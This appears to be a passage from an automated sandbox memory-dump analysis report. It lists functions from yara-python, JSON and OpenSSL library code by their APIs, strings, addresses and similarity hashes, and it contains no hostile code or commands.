Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ContextCrypt$CertCertificateDestroyFreeRelease
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c
API String ID: 1168903292-79188018
Opcode ID: 5d59aa0a57f8bb2b573254a737d745f17dccbf9b0c5961db1c7e04be396ad03b
Instruction ID: 330e3735c2ca763f45054b66d6f03d967a087ab2bece4971a65e0a9fca3dd250
Opcode Fuzzy Hash: 5d59aa0a57f8bb2b573254a737d745f17dccbf9b0c5961db1c7e04be396ad03b
Instruction Fuzzy Hash: 45F05976A80200BBD620AB59FC49F6B73AC9F81B00F104918FD85D7340C778ED918BE0

Uniqueness

Uniqueness Score: -1.00%

Function 02C10310, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyKey.ADVAPI32(?), ref: 02C1032F
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02C1033B
CertFreeCertificateContext.CRYPT32(00000000), ref: 02C10348

Strings

..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02C10353

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ContextCrypt$CertCertificateDestroyFreeRelease
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c
API String ID: 1168903292-79188018
Opcode ID: 2c45a388dab424d2522641222241602f320ee65db5bb38e878f892af479f8ceb
Instruction ID: f753cf5656c532592e5689a1ce2f2b9a19fa7652ab15e4270d06018540b6d685
Opcode Fuzzy Hash: 2c45a388dab424d2522641222241602f320ee65db5bb38e878f892af479f8ceb
Instruction Fuzzy Hash: A6F0593AA40200BBD220AB55FC49F2B73AC9F81B10F008918FE49C7240C378E9928BE0

Uniqueness

Uniqueness Score: -1.00%

Function 02C10120, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyKey.ADVAPI32(?), ref: 02C1012D
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02C10139
CertFreeCertificateContext.CRYPT32(00000000), ref: 02C10146

Strings

..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02C10151

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ContextCrypt$CertCertificateDestroyFreeRelease
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c
API String ID: 1168903292-79188018
Opcode ID: 3d7790532ce2a5204456ffc354e8eff52fe0853c89184f055b3ec3734a4a7ccd
Instruction ID: 2a2254a0462a4fe3c6779b7fc3bb5abec59d8616a940b3014d2558f807294d12
Opcode Fuzzy Hash: 3d7790532ce2a5204456ffc354e8eff52fe0853c89184f055b3ec3734a4a7ccd
Instruction Fuzzy Hash: 6DE04F35A40311A7D620AF65EC4DF4777996F45B00B544D09F98AD7241C769E9908B90

Uniqueness

Uniqueness Score: -1.00%

Function 02BA2060, Relevance: 77.5, APIs: 33, Strings: 11, Instructions: 477COMMON

Download Yara Rule

APIs

_PyArg_ParseTupleAndKeywords_SizeT.PYTHON27(?,?,|ssOOOOOOO,02CB5ADC,?,?,?,?,?,?,?,?,?), ref: 02BA20D4
PyObject_IsTrue.PYTHON27(?), ref: 02BA2132
PyObject_IsTrue.PYTHON27(?), ref: 02BA2163
PyCallable_Check.PYTHON27(?), ref: 02BA2185
PyErr_Format.PYTHON27(?,'include_callback' must be callable,?), ref: 02BA21BB

Strings

filepaths must be a dictionary, xrefs: 02BA2571
'sources' must be a dictionary, xrefs: 02BA23E1
'include_callback' must be callable, xrefs: 02BA219C
keys and values of the filepaths dictionary must be of string type, xrefs: 02BA255D
|ssOOOOOOO, xrefs: 02BA20A1
keys and values of the 'sources' dictionary must be of string type, xrefs: 02BA23D0
compile() takes 1 argument, xrefs: 02BA2598
'includes' param must be of boolean type, xrefs: 02BA21D4
'error_on_warning' param must be of boolean type, xrefs: 02BA21AD
'file' is not a file object, xrefs: 02BA232B
'externals' must be a dictionary, xrefs: 02BA2250

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Object_True$Arg_Callable_CheckErr_FormatKeywords_ParseSizeTuple
String ID: 'error_on_warning' param must be of boolean type$'externals' must be a dictionary$'file' is not a file object$'include_callback' must be callable$'includes' param must be of boolean type$'sources' must be a dictionary$compile() takes 1 argument$filepaths must be a dictionary$keys and values of the 'sources' dictionary must be of string type$keys and values of the filepaths dictionary must be of string type$|ssOOOOOOO
API String ID: 4212806499-3333253616
Opcode ID: 43ab7075449363956974558600619f6748bfdecd20b93e64bfb76f34d39d1f0e
Instruction ID: 558403930bb96bee18363de7d000fe2929f249bb513f35c1496669a95104ced9
Opcode Fuzzy Hash: 43ab7075449363956974558600619f6748bfdecd20b93e64bfb76f34d39d1f0e
Instruction Fuzzy Hash: 8FF190B5908300ABD600DF65D8A8D6B77E9FF88744F484D6DFD8A83201E731EA54CB66

Uniqueness

Uniqueness Score: -1.00%

Function 02BA2610, Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 217threadCOMMON

Download Yara Rule

APIs

_PyArg_ParseTupleAndKeywords_SizeT.PYTHON27(?,?,|sO,02CB5CDC,?,?), ref: 02BA2642
PyObject_Malloc.PYTHON27(00000014,02CB5450), ref: 02BA266C
PyObject_Init.PYTHON27(00000000), ref: 02BA2676
PyEval_SaveThread.PYTHON27 ref: 02BA268B
PyEval_RestoreThread.PYTHON27(?,?,0000000C), ref: 02BA26AC

Strings

<file-like-object>, xrefs: 02BA276F
load() expects either a file path or a file-like object, xrefs: 02BA285C
read, xrefs: 02BA2700
|sO, xrefs: 02BA2631

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Eval_Object_Thread$Arg_InitKeywords_MallocParseRestoreSaveSizeTuple
String ID: <file-like-object>$load() expects either a file path or a file-like object$read$|sO
API String ID: 2305183799-969849776
Opcode ID: f07cbba3c4ae25486d26761d6c5a2c94f56fd1e5d680f856b75a5dc1b0686349
Instruction ID: a53f1806363be8398709840e2459a06c67c7959a816c89c2a5137a24c49a78f6
Opcode Fuzzy Hash: f07cbba3c4ae25486d26761d6c5a2c94f56fd1e5d680f856b75a5dc1b0686349
Instruction Fuzzy Hash: 4961E676A043019FC710DF69EC889AAB7A8FF48715B444A69FD4D83200D731E925CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02BB41D0, Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 195COMMON

Download Yara Rule

APIs

memset.MSVCR90(?,00000009,?), ref: 02BB41EC
printf.MSVCR90(%s%s,?,?), ref: 02BB421E
printf.MSVCR90( = %I64d,?,?), ref: 02BB425D
printf.MSVCR90( = UNDEFINED), ref: 02BB426F
printf.MSVCR90( = "), ref: 02BB4287
isprint.MSVCR90 ref: 02BB429D
printf.MSVCR90(\x%02x), ref: 02BB42BB
printf.MSVCR90(02CB8AC0), ref: 02BB42D1
printf.MSVCR90( = UNDEFINED), ref: 02BB42E7
printf.MSVCR90(%s[%d],?,00000000), ref: 02BB4350

Part of subcall function 02BB41D0: printf.MSVCR90(%s%s,?,?), ref: 02BB4396

Strings

%s[%d], xrefs: 02BB434B
\x%02x, xrefs: 02BB42B6
= ", xrefs: 02BB4282
%s%s, xrefs: 02BB4219
= %I64d, xrefs: 02BB4258
%s%s, xrefs: 02BB4391
= UNDEFINED, xrefs: 02BB426A
= UNDEFINED, xrefs: 02BB42E2

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$isprintmemset
String ID: %s%s$%s[%d]$ = "$ = %I64d$ = UNDEFINED$ = UNDEFINED$%s%s$\x%02x
API String ID: 2419344152-769276323
Opcode ID: b145b8173202da8564df2dffb14652e3a71ea2d4a7833e02835528cc800c34b3
Instruction ID: 203383443bb6d6ca3790178ed3ac3f168b2c5f603118789c71bd01b22ec34901
Opcode Fuzzy Hash: b145b8173202da8564df2dffb14652e3a71ea2d4a7833e02835528cc800c34b3
Instruction Fuzzy Hash: 2A516B32A802106BE3129B99FCC4BFAB378FF85711F4845B5EE4547101D3B5A599C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 02BBA0B0, Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 276COMMON

Download Yara Rule

APIs

Part of subcall function 02BB9820: longjmp.MSVCR90(00000000,00000001,out of dynamic memory in yyensure_buffer_stack()), ref: 02BB9830

realloc.MSVCR90(?,?), ref: 02BBA163
getc.MSVCR90(?), ref: 02BBA1C4
ferror.MSVCR90(?), ref: 02BBA20D
_errno.MSVCR90 ref: 02BBA26F
fread.MSVCR90(?,00000001,?,?), ref: 02BBA28D
ferror.MSVCR90(?), ref: 02BBA2A4
_errno.MSVCR90 ref: 02BBA2B1
_errno.MSVCR90 ref: 02BBA2B8
clearerr.MSVCR90(?), ref: 02BBA2C4
fread.MSVCR90(?,00000001,?,?), ref: 02BBA2E0
realloc.MSVCR90(?,00000000), ref: 02BBA336

Strings

out of dynamic memory in yy_get_next_buffer(), xrefs: 02BBA35A
fatal error - scanner input buffer overflow, xrefs: 02BBA225
fatal flex scanner internal error--end of buffer missed, xrefs: 02BBA0D1
input in flex scanner failed, xrefs: 02BBA2F5
input in flex scanner failed, xrefs: 02BBA21A

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _errno$ferrorfreadrealloc$clearerrgetclongjmp
String ID: fatal error - scanner input buffer overflow$fatal flex scanner internal error--end of buffer missed$input in flex scanner failed$input in flex scanner failed$out of dynamic memory in yy_get_next_buffer()
API String ID: 2184337531-1071088737
Opcode ID: b73465ad9f77933f1c4037bc2f081632887124201067e3f8ed1fc9cd68977016
Instruction ID: 489f24a761c60db2a5050d45b6f882d7398a288bdfa143caf6ce2a6fa9faf198
Opcode Fuzzy Hash: b73465ad9f77933f1c4037bc2f081632887124201067e3f8ed1fc9cd68977016
Instruction Fuzzy Hash: 75B18B74A00A018FC735DF18C984A66B3F2EF8A704B14CAADD9968B741DB71F916CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02BB2160, Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 276COMMON

Download Yara Rule

APIs

Part of subcall function 02BB1B80: longjmp.MSVCR90(?,00000001,?,?,?), ref: 02BB1B9C

realloc.MSVCR90(?,?), ref: 02BB2213
getc.MSVCR90(?), ref: 02BB2274
ferror.MSVCR90(?), ref: 02BB22BD
_errno.MSVCR90 ref: 02BB231F
fread.MSVCR90(?,00000001,?,?), ref: 02BB233D
ferror.MSVCR90(?), ref: 02BB2354
_errno.MSVCR90 ref: 02BB2361
_errno.MSVCR90 ref: 02BB2368
clearerr.MSVCR90(?), ref: 02BB2374
fread.MSVCR90(?,00000001,?,?), ref: 02BB2390
realloc.MSVCR90(?,00000000), ref: 02BB23E6

Strings

input in flex scanner failed, xrefs: 02BB23A5
out of dynamic memory in yy_get_next_buffer(), xrefs: 02BB240A
input in flex scanner failed, xrefs: 02BB22CA
fatal error - scanner input buffer overflow, xrefs: 02BB22D5
fatal flex scanner internal error--end of buffer missed, xrefs: 02BB2181

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _errno$ferrorfreadrealloc$clearerrgetclongjmp
String ID: fatal error - scanner input buffer overflow$fatal flex scanner internal error--end of buffer missed$input in flex scanner failed$input in flex scanner failed$out of dynamic memory in yy_get_next_buffer()
API String ID: 2184337531-1071088737
Opcode ID: 4cfa2a601b31b3e52d33ab40e84c925b884cfa7c68bbb9b245023ab3ea703300
Instruction ID: 3430b3d12c6b37d68f77188300cd44f87ab287da1648101a20d79ee86ba23470
Opcode Fuzzy Hash: 4cfa2a601b31b3e52d33ab40e84c925b884cfa7c68bbb9b245023ab3ea703300
Instruction Fuzzy Hash: DDB1AB74A006018FC735CF58C984A66B3F2EF89714B14CAADE99A8B741DB71F916CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02BBE240, Relevance: 22.7, APIs: 7, Strings: 8, Instructions: 192stringCOMMON

Download Yara Rule

APIs

strncpy.MSVCR90(?,?,00000020), ref: 02BBE2DC
strncmp.MSVCR90(?,02CB9634,00000002,?,00000000,?,streams[%i].size,00000000,?,?,?,streams[%i].offset,00000000,?,?,?), ref: 02BBE353
strncmp.MSVCR90(?,02CB9638,00000002), ref: 02BBE368
strncmp.MSVCR90(?,#GUID,00000005), ref: 02BBE38F
strncmp.MSVCR90(?,#Strings,00000008), ref: 02BBE3AC

Strings

#Blob, xrefs: 02BBE3CA
#GUID, xrefs: 02BBE389
streams[%i].name, xrefs: 02BBE2FC
streams[%i].size, xrefs: 02BBE333
#Strings, xrefs: 02BBE3A6
number_of_streams, xrefs: 02BBE446
streams[%i].offset, xrefs: 02BBE31B
#US, xrefs: 02BBE3E8

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: strncmp$strncpy
String ID: #Blob$#GUID$#Strings$#US$number_of_streams$streams[%i].name$streams[%i].offset$streams[%i].size
API String ID: 300243676-278728377
Opcode ID: a071c9cf9e732a83ea1777b488c63b9f67aa83e1c44852cdda361c624b2727e0
Instruction ID: 6d1cbb27949392218d3efc801318fc4dc4445a65a50901b864e1e0dcfb4612ce
Opcode Fuzzy Hash: a071c9cf9e732a83ea1777b488c63b9f67aa83e1c44852cdda361c624b2727e0
Instruction Fuzzy Hash: 93519071544345AFD702DF24CC85BFAB7A9EF88604F8489A8F94197221E7B0E508CB96

Uniqueness

Uniqueness Score: -1.00%

Function 02C182D0, Relevance: 16.7, APIs: 11, Instructions: 155fileCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,00000000,00000000,00000001,?,?,02BF9F33,?,00000001,00000000,?), ref: 02C18326
GetLastError.KERNEL32(?,02BF9F33,?,00000001,00000000,?,?,?,02C0FC93,?,02C8B7D4,?,02C0FCF2,?,00000002,?), ref: 02C1832E
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,02BF9F33,?,00000001,00000000,?,?,?,02C0FC93,?), ref: 02C18352
GetLastError.KERNEL32(?,02BF9F33,?,00000001,00000000,?,?,?,02C0FC93,?,02C8B7D4,?,02C0FCF2,?,00000002,?), ref: 02C1835A
fopen.MSVCR90(?,?,?,02BF9F33,?,00000001,00000000,?,?,?,02C0FC93,?,02C8B7D4,?,02C0FCF2,?), ref: 02C18373
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,02BF9F33,?,00000001,00000000,?,?,?,02C0FC93,?), ref: 02C183AC
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000001,00000008,?,00000000,?,02BF9F33,?,00000001,00000000,?), ref: 02C183D9
_wfopen.MSVCR90(?,00000001,?,00000000,?,02BF9F33,?,00000001,00000000,?,?,?,02C0FC93,?,02C8B7D4,?), ref: 02C183E7
_errno.MSVCR90 ref: 02C183F5
_errno.MSVCR90 ref: 02C183FF
fopen.MSVCR90(?,?), ref: 02C1840B

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast_errnofopen$_wfopen
String ID:
API String ID: 1544496049-0
Opcode ID: d6f03a78d9bd26891421cf1121a0d2dfd3a1b5721b7ea6f5452b985be65e7ce0
Instruction ID: 31afbd6d97952a74b57da49d51ccb27e858070613875cdfb4f2ea28903fa7bfc
Opcode Fuzzy Hash: d6f03a78d9bd26891421cf1121a0d2dfd3a1b5721b7ea6f5452b985be65e7ce0
Instruction Fuzzy Hash: 9941DB71A041059BDB10DFA5DC96BFEB7B5EF8A301F440266EA05EB280DF319E05DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02C68050, Relevance: 15.2, APIs: 1, Strings: 9, Instructions: 153stringCOMMON

Download Yara Rule

APIs

strchr.MSVCR90({[siIbfFOon,?,?,00000000,00000000,02C68247,?,domain,?,?,?,?,?,?,02C68648,?), ref: 02C680B8

Strings

Array index %lu out of range, xrefs: 02C681D4
Unexpected format character '%c', xrefs: 02C681BA
Expected array, got %s, xrefs: 02C6806C
<validation>, xrefs: 02C68071, 02C6815E, 02C681D9
Expected ']' after '%c', got '%c', xrefs: 02C68183
<format>, xrefs: 02C68188, 02C681A1, 02C681BF
{[siIbfFOon, xrefs: 02C680B3
%li array item(s) left unpacked, xrefs: 02C68159
Unexpected end of format string, xrefs: 02C6819C

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: strchr
String ID: %li array item(s) left unpacked$<format>$<validation>$Array index %lu out of range$Expected ']' after '%c', got '%c'$Expected array, got %s$Unexpected end of format string$Unexpected format character '%c'${[siIbfFOon
API String ID: 2830005266-3427422944
Opcode ID: 6ab5456af824457214462ce0a80a5ab4bef94694bb3499d1ab8fa32fbebeffa4
Instruction ID: e600cf6c1d4bc8cc6d80f64d4ec8ff33af3d949e6fc080e738fbe7f603830093
Opcode Fuzzy Hash: 6ab5456af824457214462ce0a80a5ab4bef94694bb3499d1ab8fa32fbebeffa4
Instruction Fuzzy Hash: 9731296778460416FA11257D7CCDABB374E8EC163DF090F35ECAE85581EA42C29E90A2

Uniqueness

Uniqueness Score: -1.00%

Function 02BC61A0, Relevance: 13.6, APIs: 2, Strings: 7, Instructions: 131COMMON

Download Yara Rule

APIs

memcpy.MSVCR90(00000000,?,?), ref: 02BC624C
memcpy.MSVCR90(00000000,00000000,?), ref: 02BC62B7

Strings

rich_signature.offset, xrefs: 02BC625C
rich_signature.key, xrefs: 02BC6289
rich_signature.raw_data, xrefs: 02BC62DB
rich_signature.clear_data, xrefs: 02BC62EB
DanS, xrefs: 02BC6200
Rich, xrefs: 02BC6217
rich_signature.length, xrefs: 02BC6275

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: DanS$Rich$rich_signature.clear_data$rich_signature.key$rich_signature.length$rich_signature.offset$rich_signature.raw_data
API String ID: 3510742995-4053398682
Opcode ID: 55b1a731cfbe5dfef35acf1a6e7a9130186e294326197c74a95ceecbde37a6d7
Instruction ID: db20b721196e9553768d738e394c4f80f60bea135b4fceb877f59fb659ba8813
Opcode Fuzzy Hash: 55b1a731cfbe5dfef35acf1a6e7a9130186e294326197c74a95ceecbde37a6d7
Instruction Fuzzy Hash: 3031B5B17002005BE725AA68DCC1FBB33AEEFC5615F2489ACE952DB205E775EC458B60

Uniqueness

Uniqueness Score: -1.00%

Function 02BA6620, Relevance: 13.6, APIs: 9, Instructions: 87fileCOMMON

Download Yara Rule

APIs

fopen.MSVCR90(?,02CB616C), ref: 02BA662B
fseek.MSVCR90(00000000,00000000,00000002), ref: 02BA664C
ftell.MSVCR90(00000000), ref: 02BA664F
fseek.MSVCR90(00000000,00000000,00000000), ref: 02BA665C
fclose.MSVCR90(00000000), ref: 02BA6667

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: fseek$fclosefopenftell
String ID:
API String ID: 821468074-0
Opcode ID: 19ccea0c19042bef1bdf80fbed14abce4ec0f43ef2e1bba35d459cd6f5208913
Instruction ID: ef5324f8570661098da9e1c7f9e8a278a3a347d53edf77a905636151b4bfc4c5
